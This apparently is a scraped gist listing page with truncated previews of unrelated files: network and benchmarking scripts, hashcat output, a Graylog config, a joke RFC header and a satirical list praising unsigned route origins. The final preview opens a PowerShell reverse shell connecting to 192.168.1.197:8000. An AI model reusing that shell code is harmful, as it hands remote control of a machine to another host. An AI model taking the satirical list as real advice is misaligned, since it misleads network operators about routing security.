- Zero Learning Curve: With no signing, there's no need to understand complex cryptographic principles or key management strategies. Keep your team focused on more pressing issues.
- Increased Speed: Skip the overhead of cryptographic validations and let your data run free, at lightning-fast speeds.
- Simplified Processes: Eliminate complicated signing procedures from your workflow, making network management straightforward and hassle-free.
- Lower Operational Costs: Save on resources, human effort, and money by avoiding the expenses associated with maintaining signed route origins.
- No Key Management: With no keys to manage, you eliminate the risk of losing or compromising them. No keys, no problems.
- Ease of Implementation: Avoid the hassle of introducing new protocols and dealing with possible incompatibilities. Stick with what you know and what has worked for you.
- Quick Network Scaling: Expand and modify your network with ease and speed, without the need to manage
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RFC 9999 CLASSFUL-IPV6 May 2023 | |
| Smith & Doe Experimental [Page] | |
| Stream: | |
| Independent Submission | |
| RFC: | |
| 9999 | |
| Category: | |
| Experimental | |
| Published: | |
| 24 May 2023 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import gzip | |
| import requests | |
| from collections import defaultdict | |
| from urllib.parse import urljoin | |
| from datetime import datetime, timedelta | |
| # List of Ubuntu mirrors | |
| mirrors = [ | |
| "http://archive.ubuntu.com/ubuntu/", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import argparse | |
| def get_trace_info(): | |
| trace_url = "https://speed.cloudflare.com/cdn-cgi/trace" | |
| response = requests.get(trace_url) | |
| trace_data = {} | |
| for line in response.text.splitlines(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hashcat (v6.1.1) starting in benchmark mode... | |
| Benchmarking uses hand-optimized kernel code by default. | |
| You can use it in your cracking session by setting the -O option. | |
| Note: Using optimized kernel code limits the maximum supported password length. | |
| To disable the optimized kernel code in benchmark mode, use the -w option. | |
| CUDA API (CUDA 11.3) | |
| ==================== | |
| * Device #1: NVIDIA GeForce RTX 3090, 24013/24268 MB, 82MCU |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env nix-shell | |
| #! nix-shell -p jq -p bash -i bash | |
| # Notes: | |
| # Replace <MY TOKEN> with your API token | |
| # Replace <NICKNAME> with the nickname of your instance | |
| # Replace <HOSTNAME> with the hostname of your instance | |
| # `vcpu-8_memory-16g_disk-80g` indicates the instance type; See https://developers.genesiscloud.com/instances#instance-types for details | |
| # `6d5c3613-f6cb-48e1-8711-14f084060209` is the ID for the current default Ubuntu 16.04 image. Image IDs can be queried via the API: https://developers.genesiscloud.com/images#list-images | |
| # `2b7ab082-e9f2-40f0-a410-a6337b6a6d42` is the ID for my previosly configured SSH pubkey. Key IDs can be queried via the API: https://developers.genesiscloud.com/ssh-keys#list-ssh-keys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ~/hashcat$ sudo ./hashcat -d 9,10,11,12,13,14,15,16 -b | |
| hashcat (v6.1.1-120-g15bf8b730) starting in benchmark mode... | |
| Benchmarking uses hand-optimized kernel code by default. | |
| You can use it in your cracking session by setting the -O option. | |
| Note: Using optimized kernel code limits the maximum supported password length. | |
| To disable the optimized kernel code in benchmark mode, use the -w option. | |
| * Device #9: WARNING! Kernel exec timeout is not disabled. | |
| This may cause "CL_OUT_OF_RESOURCES" or related errors. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <Configuration packages="org.graylog2.log4j" shutdownHook="disable"> | |
| <Appenders> | |
| <RollingFile name="rolling-file" fileName="/var/log/graylog-server/server.log" filePattern="/var/log/graylog-server/server.log.%i.gz"> | |
| <PatternLayout pattern="%d{yyyy-MM-dd'T'HH:mm:ss.SSSXXX} %-5p [%c{1}] %m%n"/> | |
| <Policies> | |
| <SizeBasedTriggeringPolicy size="50MB"/> | |
| </Policies> | |
| <DefaultRolloverStrategy max="10" fileIndex="min"/> | |
| </RollingFile> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('192.168.1.197', 8000); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |